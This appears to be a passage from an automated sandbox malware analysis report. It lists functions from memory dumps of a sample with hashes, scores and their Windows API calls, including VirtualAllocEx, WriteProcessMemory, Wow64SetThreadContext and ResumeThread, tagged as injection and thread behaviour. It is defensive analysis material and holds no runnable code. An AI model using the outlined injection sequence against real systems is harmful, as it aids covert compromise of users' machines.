Instruction ID: 558f6fbcdc503520a736a1c81d246f7e1514b0d0aa8f07c2b6d8efeb51fd2316
Opcode Fuzzy Hash: 3a9bb5ae8cefe05cbad921b66f073cdd0a933bd4c07f51480a01e93de5cfc3a8
Instruction Fuzzy Hash: 512137B59003499FDB10CFAAC885BEEBBF5FF48310F10842EE919A7251C779A544CBA5

Function 076F8E40 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076F8EC6

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8d2ecae020542dcb3c36f0355c8d8ddbdfd3ef28b8c8c7003020099ab1b44669
Instruction ID: 305822f15cb9f67857a4676d8748b0da77b9a3def1380cbe47cabd3cc5a5d132
Opcode Fuzzy Hash: 8d2ecae020542dcb3c36f0355c8d8ddbdfd3ef28b8c8c7003020099ab1b44669
Instruction Fuzzy Hash: 2B217AB1D003099FEB10CFAAC4847EFBBF5EF88214F148429D559A7341CB78A945CBA4

Function 076F8FE0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076F9070

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c3ab41dcad6de977a889c6f890bcf1c74cd91a5e43fd99a786794d4c022b9d3d
Instruction ID: 848fb53ffbe8f3f03c11bbaf3fb9e9cf9f9bf75779b6574c9bf6fb601a3e2524
Opcode Fuzzy Hash: c3ab41dcad6de977a889c6f890bcf1c74cd91a5e43fd99a786794d4c022b9d3d
Instruction Fuzzy Hash: 132126B19003499FDB14CFAAC881BDEBBF5FF48310F10842AE919A7340C779A940CBA5

Function 076F90C9 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076F9150

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 88f36bad0e30b7d8aa3b5dc282242dc2b1c69574c83ae61d29d22decacaf7c62
Instruction ID: 4904b9d22cf09ff4acc2810f23c414a89e5751b6fbf66411756ca3718f910043
Opcode Fuzzy Hash: 88f36bad0e30b7d8aa3b5dc282242dc2b1c69574c83ae61d29d22decacaf7c62
Instruction Fuzzy Hash: AE212AB1C003499FDB10DFAAC844BEEBBF5FF48310F10842AE519A7250C779A544CBA5

Function 07484680 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 0748470F

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: a20c1661239fe4900c25458b18f5326fbffc5e3f95217b2ff7935303a6fcbd69
Instruction ID: 5254255d36f80a282b228e9c8959a6632e5520e41ebfdcc12ee848be1aa68f6d
Opcode Fuzzy Hash: a20c1661239fe4900c25458b18f5326fbffc5e3f95217b2ff7935303a6fcbd69
Instruction Fuzzy Hash: 2A219AB99043899FCB11DFAAD4047EEBFF0FB49220F10845AD895BB241C3386A44CFA1

Function 0153D520 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D5AF

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1f451a4b401bbec60363f0a9228bed33012b2001b5f363efc5202bc98f860c93
Instruction ID: af586c6d6c248b4017a15ec07b868b3d45ebbe8dd4afffc9c988bc0f6dbda4fd
Opcode Fuzzy Hash: 1f451a4b401bbec60363f0a9228bed33012b2001b5f363efc5202bc98f860c93
Instruction Fuzzy Hash: 3B21E6B5D01248EFDB10CF9AD884ADEBBF8FB48310F14841AE918A7350D378A944CFA5

Function 07484690 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 0748470F

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: ffa0a22c2481708ae862f192c3c873c9a0133df8a600c3f6bf038cb8cb22901c
Instruction ID: 089a436a11d1d60fc0d9b5f11c639c21a1053bd935a7d803cd7d7fb6f03f4058
Opcode Fuzzy Hash: ffa0a22c2481708ae862f192c3c873c9a0133df8a600c3f6bf038cb8cb22901c
Instruction Fuzzy Hash: 09217AB5A002499FDB10EF9AD404BEEFBF5FB49210F10841AE855BB380C7356944CFA1

Function 076F90D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076F9150

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a05acd191c181d9a5d13c63d69af463b76958d58d822be83cb25d5c1cd2b035f
Instruction ID: f5803c6dd3496243a5dcde300f6ebb27eee0afe62c100379c2223ef0bdc1025d
Opcode Fuzzy Hash: a05acd191c181d9a5d13c63d69af463b76958d58d822be83cb25d5c1cd2b035f
Instruction Fuzzy Hash: AF21F8B1C003599FDB14DFAAC884BEEBBF5FF48310F10842AE959A7240C779A540DBA5

Function 076F8F18 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076F8F8E

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 75c57b6226be28a5889a93d64d786af60c10a7d4a17a58a79ba4e2e232170dbb
Instruction ID: ed77fb5702bfe1249291c45a70ba548f87be59fb7f223e93afac4c6b15bb9ceb
Opcode Fuzzy Hash: 75c57b6226be28a5889a93d64d786af60c10a7d4a17a58a79ba4e2e232170dbb
Instruction Fuzzy Hash: 4021BB728043899FDB20CFAAC801BEEBFF5EF48320F14845AE555A7240CB799540CBA1

Function 076F8E48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076F8EC6

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e03c5599552cdb2b489b2567a430511684e09d1ddb6a201087afb03d8a0b5750
Instruction ID: 9f25ba75bac3ae6c7ec7d78a5f9d3a8e79ef3588da3d09465e68c0f00a2def40
Opcode Fuzzy Hash: e03c5599552cdb2b489b2567a430511684e09d1ddb6a201087afb03d8a0b5750
Instruction Fuzzy Hash: B62138B1D003099FDB14DFAAC4847EEBBF4EF48210F14842AD519A7341CB78A945CFA5

Function 0153D528 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D5AF

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c7022ff0dcb4726e1100a7bcb6d157bd11bfe047d977e430a8c66cdce6023233
Instruction ID: 0033f6948d2977b33642373fe1f0c9cf92a1fd0b91832de6481b8e8b143c5c12
Opcode Fuzzy Hash: c7022ff0dcb4726e1100a7bcb6d157bd11bfe047d977e430a8c66cdce6023233
Instruction Fuzzy Hash: EC21E4B5D01248EFDB10CF9AD484ADEBBF4FB48310F14841AE914A7350D378A944CFA5

Function 076F8F20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076F8F8E

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fdb7011e4c3c864f8b405fb365c1959b19c42823352752876300f8172dd18550
Instruction ID: 584ddf8c26c5276ed4b196e704dbd926f7acda3b4d831d98a0ded07a87ae287a
Opcode Fuzzy Hash: fdb7011e4c3c864f8b405fb365c1959b19c42823352752876300f8172dd18550
Instruction Fuzzy Hash: 431126728003499FDB24DFAAC844BDEBBF5EF48320F14881AE515A7250CB75A540CBA5

Function 076F8D90 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 076F8DFA

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c484a8d7fce4700c45b8c946bd2ca9db281441e9afbd4385549935fefc7cc3c3
Instruction ID: b99f8f0430ab87681af05090f55e934dd103689ee29dc193c72f11329190df81
Opcode Fuzzy Hash: c484a8d7fce4700c45b8c946bd2ca9db281441e9afbd4385549935fefc7cc3c3
Instruction Fuzzy Hash: 2A1176B1C003498FDB24DFAAD4447EEFBF4EF48220F10881ED519A7640CA79A940CBA5

Function 076F8D98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 076F8DFA

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 62b742c4e37e13b857e5b8509679e42cce5f42db30570a3f5970d3bb59cbfd71
Instruction ID: 74ba6076c3ad8660283a8654e7495a74ed156662d051d2bc6e78139e35b3b336
Opcode Fuzzy Hash: 62b742c4e37e13b857e5b8509679e42cce5f42db30570a3f5970d3bb59cbfd71
Instruction Fuzzy Hash: 2A1128B1D003498FDB24DFAAC4447DEFBF5EF48210F14841AD519A7240CA79A540CB95

Function 076FD0C9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 076FD12D

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 91d9201d7611c8f6d516cccd28c1d6359289609f6e04db88a37b8f770f7e9d62
Instruction ID: ed4f745dada07ceefe7c8a74e0911d70a5a2c3e9dfce10af1bf461c609e3af93
Opcode Fuzzy Hash: 91d9201d7611c8f6d516cccd28c1d6359289609f6e04db88a37b8f770f7e9d62
Instruction Fuzzy Hash: 061125B5900349DFEB10DF9AD884BDEBFF8EB48314F10841AE558A7241C375A544CFA1

Function 076F5C60 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 076FD12D

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 75624de7aab001636d7f8ea7ee4641ca21538ea70eebb602dca13cd87d7e2bd5
Instruction ID: e15efff0b7c8a92f2eedfde12316b163cbfb5aaf1c9db20f388426542af9dcab
Opcode Fuzzy Hash: 75624de7aab001636d7f8ea7ee4641ca21538ea70eebb602dca13cd87d7e2bd5
Instruction Fuzzy Hash: 271103B5900749DFDB20DF9AD845BDEBBF8EB49310F10841AE919A7340C375A944CFA5

Function 0153B238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0153B29E

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c89e3b94c7990af0ae136dccbc4b9314c8d32cfcc5c0ecf4dce6de7b968d41de
Instruction ID: 6764aab4b8d165c32cc527eaa5e4195f24e505b203ae412e4f339c1e725a1dd7
Opcode Fuzzy Hash: c89e3b94c7990af0ae136dccbc4b9314c8d32cfcc5c0ecf4dce6de7b968d41de
Instruction Fuzzy Hash: 071110B6C003498FEB20CF9AC444BDEFBF4EB88310F10851AD828AB200C379A545CFA1

Function 014DD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304299465.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dd000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8568ca5a7bf7e195e12216208d4eb954a86ca837ff60394b2e29bbfd20fde4b8
Instruction ID: 40330145f3749408cd14b0141efb305e47a7ab7f98002eb4cd4867e8e37dd789
Opcode Fuzzy Hash: 8568ca5a7bf7e195e12216208d4eb954a86ca837ff60394b2e29bbfd20fde4b8
Instruction Fuzzy Hash: B121F472900204EFDF15DF54D9C0B66BB65FB84324F20C57EE9090B2A6C336E456CAA2

Function 014ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b89c64a0f467d7e8f659aefb9b0620506b073f614d4325916ae49789fc9d8639
Instruction ID: ba01def87cd46a8dc2e0a159b2fca43eb1da5a80629ef9637ff396f9a760c628
Opcode Fuzzy Hash: b89c64a0f467d7e8f659aefb9b0620506b073f614d4325916ae49789fc9d8639
Instruction Fuzzy Hash: E82106B1904200DFDB15DF54D588B16BFA1FB84319F28C56ED90A0B3A6C336D407CA61

Function 014ED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c031c2bc2e19aad99b5e5ba7a3216e04bcc6c3bd9cecbfb9b6746684a08db50
Instruction ID: 4fde3ea853603c4720e0404c21645b9cb82d34415d1bc15d5f228c290b165bf7
Opcode Fuzzy Hash: 0c031c2bc2e19aad99b5e5ba7a3216e04bcc6c3bd9cecbfb9b6746684a08db50
Instruction Fuzzy Hash: B521F575D04200EFDB15DFA4D9C8B26BBA5FB84325F20C56EE9494F3A2C336D446CA62

Function 014ED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b917d1456fd132d673e557b93206d98c8e36cb0768cdf227ebe639e198f4b415
Instruction ID: 8e55c36753d201a92b7fea55bed99c6d02895c0e9e7cdf676bd552c137a109d8
Opcode Fuzzy Hash: b917d1456fd132d673e557b93206d98c8e36cb0768cdf227ebe639e198f4b415
Instruction Fuzzy Hash: 4121B3755093808FCB02CF24D594712BFB1EF46214F28C5DBD8498F6A3C33A980ACB62

Function 014DD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304299465.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14dd000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: a5815d12db6f8e172e6a993b61caaefbb53b0d60aee79770efb3a4a373769491
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 5511C072804240DFDF16CF44D5C0B56BF61FB84324F2486AAD9090B6A7C33AE456CBA1

Function 014ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1304524360.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14ed000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 314b18b8386c16644256b9fb1baed49a13adf10d4129067ba12a2f1c093fdc7c
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: D211BB75904280DFDB16CF54D6C4B16FFA1FB84324F24C6AAD8494B7A6C33AD40ACB62

Non-executed Functions

Function 07487488 Relevance: 6.7, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

,q, xrefs: 074876C7
(oq, xrefs: 07487933
,q, xrefs: 074876B7
Hq, xrefs: 074879A0
(oq, xrefs: 07487929

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q$Hq
API String ID: 0-962059274
Opcode ID: 1359e32fdf311d4090fd8202ad79883332ecff30172a4e9f826bd169f9824835
Instruction ID: 3af8d25f2af672f2f677417a591978113ee689333a1c80c1ad9b1f3914fd3456
Opcode Fuzzy Hash: 1359e32fdf311d4090fd8202ad79883332ecff30172a4e9f826bd169f9824835
Instruction Fuzzy Hash: 2A0263B5A00119DFDB55EFB9C494AAEBBB2BF85710B25815AE806DB370DB30EC41CB50

Function 076F6628 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

ug, xrefs: 076F6683

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: ug
API String ID: 0-2775834119
Opcode ID: c4cc1b1da7c99be42097ffd4179f793427de4605dd574cc7e22d603848ff54f8
Instruction ID: 9dfe557c199563661ee695f626bb5cb53a35d26963043ed612bc071460d4cfa1
Opcode Fuzzy Hash: c4cc1b1da7c99be42097ffd4179f793427de4605dd574cc7e22d603848ff54f8
Instruction Fuzzy Hash: B5E10BB4E002198FDB14DFA9C590AAEFBB2FF49305F248169D915AB359D7309942CFA0

Function 0748B3C9 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 0748B4AA

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 26f8152f8853799bbb2831c82ef4982ce8ee17d761cd1ac9f0d58113915d748f
Instruction ID: 09a4999b6c8d7a42952a4ab607e9dce09ed8813fe8e60d0799b3b1a360ca720b
Opcode Fuzzy Hash: 26f8152f8853799bbb2831c82ef4982ce8ee17d761cd1ac9f0d58113915d748f
Instruction Fuzzy Hash: 2E61D1B0E112099FE748EF7AE45169D7BF3FB88200F14D52AD008AF369EB70554ADB51

Function 0748B3D8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 0748B4AA

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: c1eefcd1ae9b6662b0f7b49067ac3ef4eca2883fdb808fc9ecf3a727a274a3e1
Instruction ID: 26cdaa9a9e3648bc49344afbf358bdc2cf62769bfac9e153ce910794d2d3fd41
Opcode Fuzzy Hash: c1eefcd1ae9b6662b0f7b49067ac3ef4eca2883fdb808fc9ecf3a727a274a3e1
Instruction Fuzzy Hash: 8361E2B0E112098FEB48EF7AE45169D7BF3FB88200F14D52AD004AF369EB70544ADB51

Function 076F7EC7 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc82c0a812a0e090f4caffa095847682a15ea2525f93009a9a19c017a68aaa6
Instruction ID: 6e61fd9097e5b7e752594ea50cbaa456458def9621e39c6f4005680b6ef79572
Opcode Fuzzy Hash: ecc82c0a812a0e090f4caffa095847682a15ea2525f93009a9a19c017a68aaa6
Instruction Fuzzy Hash: 78D16FB1A00216CFCB14CF69C5846ADBBF2FF89315F6481A9D51AAB356D731DC42CBA0

Function 076F8570 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0673b7279e8d52eec3f666fe1d815e97728b84567d7c41ebab5897cf796529
Instruction ID: 86f1f61235ea9a03099fe8166ce0b8733cfdcbf2f0ed3715696538caa0818f7f
Opcode Fuzzy Hash: 3a0673b7279e8d52eec3f666fe1d815e97728b84567d7c41ebab5897cf796529
Instruction Fuzzy Hash: 92E10DB4E0025A8FDB14DFA8C590AAEFBF2BF49304F248199D515AB359D730A942CF61

Function 076F8138 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fdc3dc4ee6ac833f71b75cd784d839f7ef04c43f717561c46f341aa88c156f
Instruction ID: a13c31f0ff19a55dd4d1e3f7b5d5cf2a1144dbe4dfe3afc01e3bf4d9fac128b3
Opcode Fuzzy Hash: d6fdc3dc4ee6ac833f71b75cd784d839f7ef04c43f717561c46f341aa88c156f
Instruction Fuzzy Hash: 2DE12FB4E0021A8FDB14DFA8C5909AEFBF2FF49305F248199D515AB355D730A942CFA0

Function 076F6E98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea164c2169ab0a57a9bb5b494080ed069bd86ef86e9cab5a078c8ad146f9ae07
Instruction ID: d1f51da433954e1df889bc6213fe7b3f044bfc13b7e021ee3d348b4a2c6d7e81
Opcode Fuzzy Hash: ea164c2169ab0a57a9bb5b494080ed069bd86ef86e9cab5a078c8ad146f9ae07
Instruction Fuzzy Hash: 57E13FB4E002198FDB14DFA9C580AAEFBF2FF49305F248159D515AB359C730A942CFA0

Function 076F6A60 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d1495ea4f24691d93d991df56e8dd33b3c1d71ddcbbfd75c287c39fae4f8fb
Instruction ID: fc0a4eafc378b622a71aa6176b2102abf79cf12b963c22da904aa9754c9f3294
Opcode Fuzzy Hash: 07d1495ea4f24691d93d991df56e8dd33b3c1d71ddcbbfd75c287c39fae4f8fb
Instruction Fuzzy Hash: F2E12CB4E002598FDB14DFA8C580AAEFBF2FF49304F248169D915AB359D731A942CF60

Function 0153DE34 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b16fd9cd92db82f72a8f9b866f4da7e268f3d5ba1eac6e9300b8475ddaad79
Instruction ID: 5b2031b7d645ac0b46434d53eda478163aed742b6826f168024484524fa822d6
Opcode Fuzzy Hash: f3b16fd9cd92db82f72a8f9b866f4da7e268f3d5ba1eac6e9300b8475ddaad79
Instruction Fuzzy Hash: 71A18D32E0021A8FCF15DFB4C88499EBBB2FFD4300B15456AE905AF265DB71E916DB90

Function 0748E418 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8984ef3826679e47593093975f2a02b38c6e2dfd8238b0ad243a415b9d954ff9
Instruction ID: 64658efdf79c06c91afa566fff55dbada2c3e4f67f39dd49af428f7a643c3806
Opcode Fuzzy Hash: 8984ef3826679e47593093975f2a02b38c6e2dfd8238b0ad243a415b9d954ff9
Instruction Fuzzy Hash: 0B71F4B0D0522DCFDB54EFE9D444AEEBBB6EF8A300F24912AD809A7255DB345946CF40

Function 076F6E89 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

